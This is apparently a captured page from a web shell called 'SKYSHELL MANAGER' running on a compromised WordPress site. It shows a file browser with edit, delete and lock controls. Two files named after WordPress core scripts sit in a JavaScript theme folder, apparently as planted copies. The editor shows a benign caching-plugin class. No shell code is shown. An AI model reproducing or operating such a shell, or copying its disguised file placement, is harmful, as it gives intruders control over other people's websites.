📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: UserExperience_Page.php
<?php /** * File: UserExperience_Page.php * * @package W3TC */ namespace W3TC; /** * Class UserExperience_Page */ class UserExperience_Page { /** * Renders the content of the User Experience page. * * This method retrieves configuration data using the Dispatcher class and includes * the corresponding view file for rendering the User Experience page content. * * @return void */ public function render_content() { $c = Dispatcher::config(); include W3TC_DIR . '/UserExperience_Page_View.php'; } }
Save